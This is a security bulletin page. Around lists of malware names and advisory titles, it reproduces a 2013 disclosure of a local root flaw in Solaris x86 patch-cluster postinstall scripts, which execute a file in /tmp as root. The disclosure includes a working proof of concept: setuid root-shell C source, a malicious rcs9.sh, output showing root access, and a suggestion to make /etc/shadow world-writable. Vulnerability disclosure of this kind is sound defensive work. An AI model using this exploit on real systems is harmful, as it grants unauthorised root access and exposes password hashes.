Security Bulletins
Latest Malware Updates
Downloader.Busadom!g102/27/2015Infostealer.Posteal02/26/2015Downloader.Busadom02/26/2015Trojan.Ladocosm02/26/2015SONAR.SuspDocRun02/25/2015SONAR.SuspHelpRun02/25/2015W32.Tempedreve.D!inf02/25/2015SONAR.PUA!AlnadInsta02/25/2015SONAR.Infostealer!g502/25/2015SONAR.Infostealer!g402/25/2015 |
07/09/2013
Solaris Recommended Patch Cluster 6/19 Local root on x86Solaris Recommended Patch Cluster 6/19 local root on x86Larry W. Cashdollar 7/3/2013 @_larry0 If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based. Local root: Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root. ./144751-01/SUNWos86r/install/postinstall 782 if [ -s /tmp/disketterc.d/rcs9.sh ] 783 then 784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 785 fi Inject entries into driver_aliases, research config file? maybe we can load our own library/driver? 804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs) 805 TMPFILE=/tmp/ncrstmp 806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL E 807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases ./141445-09/SUNWos86r/install/postinstall 656 if [ -s /tmp/disketterc.d/rcs9.sh ] 657 then 658 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 659 fi Well, it looks like you've got a few chances to abuse it: larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \; ./144501-19/SUNWos86r/install/postinstall ./141445-09/SUNWos86r/install/postinstall ./142059-01/SUNWos86r/install/postinstall ./147148-26/SUNWos86r/install/postinstall ./127128-11/SUNWos86r/install/postinstall ./148889-03/SUNWos86r/install/postinstall ./142910-17/SUNWos86r/install/postinstall ./144751-01/SUNWos86r/install/postinstall Psuedo PoC: Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry. chmod 666 /etc/shadow would be easy. PoC: larry@slowaris:~$ cat setuid.c #include #include int main (void) { char *shell[2]; shell[0] = "sh"; shell[1] = NULL; setregid (0, 0); setreuid (0, 0); execve ("/bin/sh", shell, NULL); return(0); } gcc -o /tmp/r00t setuid.c larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t After patches have been applied: larry@slowaris:~$ /tmp/r00t # id uid=0(root) gid=0(root) |
Security Advisories Database
Remote Code Execution Vulnerability in Microsoft OpenType Font DriverA remote attacker can execute arbitrary code on the target system. 07/21/2015Multiple Vulnerabilities in Linux kernel03/04/2015SQL Injection Vulnerability in PiwigoSQL inection vulnerability has been discovered in Piwigo. 02/05/2015Cross-site Scripting Vulnerability in DotNetNukeA cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke. 02/05/2015Cross-site Scripting Vulnerability in Hitachi Command SuiteA cross-site scripting vulnerability was found in Hitachi Command Suite. 02/02/2015Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk HandlingAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-ForwardsAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in MalwareBytes Anti-Exploit "mbae.sys"An attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Linux Kernel spliceAn attacker can perform a denial of service attack. 01/29/2015Denial of service vulnerability in Python Pillow Module PNG Text Chunks DecompressionAn attacker can perform a denial of service attack. 01/20/2015 |